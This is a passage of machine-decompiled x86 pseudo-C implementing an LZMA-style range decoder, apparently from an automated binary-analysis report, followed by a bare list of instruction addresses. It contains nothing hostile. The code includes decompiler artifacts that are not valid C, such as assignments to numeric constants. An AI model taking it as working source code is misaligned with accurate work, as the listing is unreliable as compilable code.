								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                          0x00000000
                                          0x00406d5f
                                          0x00406d5f
                                          0x00406d64
                                          0x00406ddb
                                          0x00406de2
                                          0x00406dec
                                          0x004073cb
                                          0x004073cb
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00407441
                                          0x00407441
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x0040741c
                                          0x0040741c
                                          0x00407420
                                          0x004075cf
                                          0x00000000
                                          0x004075cf
                                          0x0040742c
                                          0x00407433
                                          0x0040743b
                                          0x0040743e
                                          0x00000000
                                          0x0040743e
                                          0x00406d66
                                          0x00406d66
                                          0x00406d6a
                                          0x00406d72
                                          0x00406d75
                                          0x00406d77
                                          0x00406d7a
                                          0x00406d7c
                                          0x00406d81
                                          0x00406d84
                                          0x00406d8b
                                          0x00406d92
                                          0x00406d95
                                          0x00406da0
                                          0x00406da8
                                          0x00406da8
                                          0x00406da2
                                          0x00406da2
                                          0x00406da2
                                          0x00406d97
                                          0x00406d97
                                          0x00406d97
                                          0x00406daf
                                          0x00406dcd
                                          0x00406dcf
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406ff4
                                          0x00406ff7
                                          0x00406f9a
                                          0x00406fa0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406ff9
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00000000
                                          0x00406f97
                                          0x00406db1
                                          0x00406db1
                                          0x00406db4
                                          0x00406dba
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbf
                                          0x00406dc2
                                          0x00406dc4
                                          0x00406dc5
                                          0x00406dc8
                                          0x00406e35
                                          0x00406e35
                                          0x00406e39
                                          0x00406e3c
                                          0x00406e3f
                                          0x00406e42
                                          0x00406e45
                                          0x00406e46
                                          0x00406e49
                                          0x00406e4b
                                          0x00406e51
                                          0x00406e54
                                          0x00406e57
                                          0x00406e5a
                                          0x00406e5d
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406ea3
                                          0x00406ea6
                                          0x00406e1d
                                          0x00406e1d
                                          0x00406e23
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f30
                                          0x00406f33
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
